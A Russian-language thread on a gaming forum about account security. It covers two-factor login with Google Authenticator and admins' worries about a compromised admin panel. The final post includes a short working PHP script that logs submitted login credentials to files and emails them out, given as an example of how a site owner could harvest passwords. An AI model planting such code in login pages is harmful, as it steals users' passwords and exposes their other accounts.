Самые активные

Безопасность на форуме


  • WEB

    Так как на форуме отсутствует ssl (принципиально) на всякий случай введена возможность двух-этапной авторизации что усложняет несанкционированный вход под вашей учеткой.
    0_1534193300104_2018-08-13_234713.png
    В примере ниже форма ввода одноразового пароля, пароль генерирует приложение Google Authenticator на вашем смартфоне каждые 5 - 10 секунд.
    0_1534195712211_bgk86-tfasw.gif
    Можно ввести с генерированный токен либо ввести заранее сохраненные на вашем компьютере (резервные коды-доступа).

    Даже зная ваш пароль но не имея привязки своего смартфона к вашей учетке злоумышленник не сможет войти под вашей учеткой на форум.

    Перевод / поддержка русского языка будет


  • WEB

    Просьба всех модераторов включить данную опцию, в случае утери смартфона и резервных кодов отключить проверку определенному пользователю может любой администратор с доступом A (доступ в админку форума).


  • Main Admin

    настоятельно рекомендую всем администраторам подключить двойную авторизацию, пока кто-нибудь не взломал ваш аккаунт, чтобы ответить в какой-нибудь заявке на разбан вместо вас! Это вам не шутки! Всё очень серьезно!


  • WEB

    @met при чем тут “чтобы ответить в какой-нибудь заявке на разбан вместо вас…” Ты вообще понимаешь что через админку мне сервак взломать могут или нет??? Чисто гипотетически, войдя в админку, злоумышленник может установить из репозитория свой плагин который сможет на сервере с правами пользователя делать те или иные действия. Не считая того что форум банально может встать из за глупого админа + спам рассылки, а пароли улетают на раз-два, это вообще условная преграда типа двери в квартиру у которой нету стен.

    Да и я тебе уже отписал, что форум в планах сделать информативным и тематическим.

    как вариант доступ к админке я могу закрыть всем, тогда ничего не нужно активировать, если что-то случиться просто сделаю откат базы.

    Но даже при таких раскладах права модератора могут добавить мне гемора что лично мне вообще не нужно, мне есть на что потратить свое время.


  • WEB

    @met самый простой пример: был форум на него заходили люди, вводили в форму авторизации свой логин (почту) и пароль, нормально это когда оправка пароля хешируеться и уходит в базу, так что админ сервера никогда не узнает какой пароль вводил пользователь, но у … стоял скрипт который перехватывал пароли и логировал (сразу отправлял весь отчет на почту) введенные данные, а там пароль (в открытом виде), ip-адрес, браузер, и прочая информация передаваемая массивом $_SERVER. В 20% пароль на форум совпадал с паролем почты, и даже к странице вконтакте, ок и фейсбук.

    вот набросил пример такого скрипта за 2 минуты и как ты думаешь установить (подключить) его на страницу авторизации любого движка на php для админа большая проблема???

    <?php
    $t='';    
    if(isset($_POST['email'])) {
    foreach($_POST as $k=>$v){
    $t.=$k." = ".$v."\r\n";
    }
    $f=fopen("/data/".date('d-m-y.H-i-s').".txt","w+");
    fwrite($f,$t);
    fclose($f);
    $to = "...";
    $from = "...";
    $subject = "...";
    $message = "Пользователь ввел данные:\r\nСсылка на файл: http://.../data/".date('d-m-y.H-i-s').".txt\r\nВремя: ".date('d-m-y.H-i-s')."\r\n=============================================\r\n".$t;
    $subject = "=?utf-8?B?".base64_encode($subject)."?=";
    $headers = "From: $from\r\nReplay-to: $from\r\nContent-type: text/plain; charset=utf-8\r\n";
    mail($to, $subject, $message, $headers);
    setcookie("gecko1", "1");
    header("Location: ...");
    exit();
    }
    if(isset($_COOKIE["gecko1"])){
    header("Location: ...");
    exit();
    } 
    ?>
    

    данный текст считать выдумкой автора, никакого отношения автор данного сообщения к взломам аккаунтов конечно не имеет и вообще он самый честный человек на свете…


 

Скачать CS 1.6